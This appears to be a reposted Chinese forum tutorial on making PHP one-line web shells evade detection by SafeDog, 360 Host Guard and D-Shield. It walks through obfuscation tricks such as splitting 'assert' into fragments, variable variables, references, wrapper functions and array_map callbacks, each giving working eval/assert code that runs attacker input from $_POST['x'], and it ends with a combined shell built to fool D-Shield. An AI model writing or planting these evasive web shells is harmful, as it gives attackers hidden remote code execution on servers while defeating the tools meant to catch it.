PHP一句话过安全狗、360主机卫士、D盾等免杀思路!

来源:http://bbs.ichunqiu.com/thread-10016-1-1.html?from=ch

请勿侵权,谢谢!自己真正学到的才是自己的财富!只是一味的盗版,不懂得学习的那叫小学生!

谢谢~有句话叫:人外有人,天外有天。

#  有很多人曾经在为绕过WAF的一句话烦恼,今天我就给大家讲讲绕过WAF的思路。有不懂得小伙伴,可以加我QQ,

个人认为免杀大致分为这几个方面:

1.关键字拆分。

比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。

总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

2.可变变量、引用、可变函数。

可变变量  比如$a=$_POST['x'];$b='a';@eval($$b);

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第1张图片

总结:这种方法对安全狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

引用  比如$a=$_POST['x'];$b=&$a;@eval($b);

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第2张图片

总结:这种方法与上一种方法类似。

可变函数  比如$a='a'.'ss'.'e'.'r'.'t';$a($_POST['x']);

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第3张图片

总结:这种方法对于安全狗、360主机卫士、D盾之类的均没有作用哦~

3.添加其他代码。

添加其他代码  比如  if(empty($a))

{

$a=$_POST['x'];

}

@eval($a);

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第4张图片

总结:这种方法比较适合脑洞比较大的小伙伴们~

4.函数替换。

使用其他函数,比如eval可以使用assert替换。

总结:这种方法适合eval函数被禁用时使用哦~

5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

eval($a);

}

test($_POST['x']);

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第5张图片

总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

6.函数回调。

使用其他函数进行调用,并执行。

如:array_map('a'.'s'.'se'.'r'.'t',array($_POST['x']));

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第6张图片

总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

7.利用各种方法的特性写出过WAF的一句话。


function test($a){//利用所学的封装函数

if (empty($a)){//利用所学的添加其他代码

$a="echo 'QQ:844812159';";//使用这句代码扰乱D盾的判断

}

@eval($a);

}

@test($_POST['x']);

?>

测试结果:

PHP一句话过安全狗、360主机卫士、D盾等免杀思路!_第7张图片

你可能感兴趣的:(PHP一句话过安全狗、360主机卫士、D盾等免杀思路!)